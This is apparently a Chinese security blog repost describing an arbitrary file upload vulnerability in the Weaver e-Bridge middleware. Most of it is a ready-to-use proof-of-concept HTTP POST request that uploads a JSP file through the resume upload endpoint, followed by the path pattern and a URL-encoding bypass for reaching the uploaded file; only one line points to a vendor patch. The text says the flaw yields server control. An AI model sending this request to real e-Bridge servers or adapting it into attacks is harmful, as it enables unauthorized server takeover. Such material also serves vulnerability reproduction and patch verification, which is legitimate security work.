漏洞简介
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。
漏洞利用
具体原理可以移步至这位师傅的文章:xxx系统漏洞简单分析 (qq.com)
上传POC如下:
POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: EBRIDGE_JSESSIONID=6E01926E757A8B0BE87DAA2EACC80EF6
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7
Content-Length: 264
------WebKitFormBoundaryDOVhr5SwLI1wpry7
Content-Disposition: form-data; name="file";filename="1.jsp"
1
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
Content-Disposition: form-data; name="file";filename="2.jsp"
1
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
访问/upload/{时间年月,如:202408}/{随机大写字母}/1.js%70
星球分享利用参考脚本演示如下:
修复建议
安装相关补丁:https://wx.weaver.com.cn/download/security
原文始发于微信公众号(良月安全):[漏洞复现]泛微云桥ebridge最新文件上传漏洞利用(含POC及绕过)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论